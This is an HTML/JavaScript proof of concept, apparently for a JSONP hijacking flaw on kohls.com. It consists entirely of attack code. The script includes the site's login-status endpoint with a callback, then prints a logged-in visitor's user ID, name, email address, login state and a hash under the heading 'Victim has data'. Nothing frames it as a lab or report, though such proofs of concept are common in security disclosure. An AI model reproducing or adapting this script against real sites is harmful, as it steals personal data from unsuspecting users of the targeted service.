<script type="text/javascript">

function myCallback(data) {
    var len = data.bodyContent.length;
    alert(len);
    for (var i=0; i<len; i++) {
        document.write('Victim has data: <br>'+
        'Kohl User ID: '+data.prospectApps[i].kohlsUserId+'<br>'+
        'User FirstName: '+ data.prospectApps[i].firstname+'<br>'+
        'User LastName: '+data.prospectApps[i].lastname+'<br>'+
        'User Email Address: '+data.prospectApps[i].emailAddress+'<br>'+
        'User Logged In: '+data.prospectApps[i].userLoggedIn+'<br>'+
        'New Hash: '+data.prospectApps[i].newhash+'<br><br>');
    }
}
</script>
<script src='https://www.kohls.com/upgrade/myaccount/login_status.jsp?callback=myCallback'></script>


